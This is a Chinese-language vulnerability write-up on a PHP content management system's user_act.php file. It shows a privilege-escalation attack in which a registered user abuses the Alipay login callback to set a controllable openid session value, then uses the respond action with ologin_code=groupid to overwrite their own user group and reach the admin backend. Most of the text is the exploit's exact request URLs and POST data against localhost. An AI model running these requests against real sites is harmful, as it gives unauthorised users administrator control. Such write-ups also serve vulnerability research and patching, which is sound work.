user_act.php(130-155):
第一步 我们注册一个为test 密码为 111111的用户
然后发送url:
http://localhost/uploads/index.php?case=user&act=respond&ologin_code=groupid
postdata:
username=test&password=111111&submit=xxx
第二步:
$post[$classname] = session::get('openid');
这里 我们给$post传递进去了groupid 但是有个问题 session::get('openid') 并不存在 所以执行后 test用户的groupid 为0
那么下来我们在继续找一下
line 157-172:
这里我们看看是不是要写session 其他的认证信息 我们都忽略 我们只关心这里的openid生效不 可控不
当$classname为alipaylogin.php时候 我们跟进去
if(true || $verify_result) {//验证成功 这一行我们让它永远成立 因为在这之前全是配置信息的东西
我们直接看这里
发现没有openid完全可控制
我们发送url:
http://localhost/uploads/index.php?case=user&act=respond&ologin_code=alipaylogin&user_id=2&real_name=test
这时候我们的openid被设置为了2
那么我们回头在看看
发送url:
http://localhost/uploads/index.php?case=user&act=respond&ologin_code=groupid
postdata:
username=test&password=111111&submit=xxx
这时候 看看 我们的test用户组为:
我们在登陆后台看看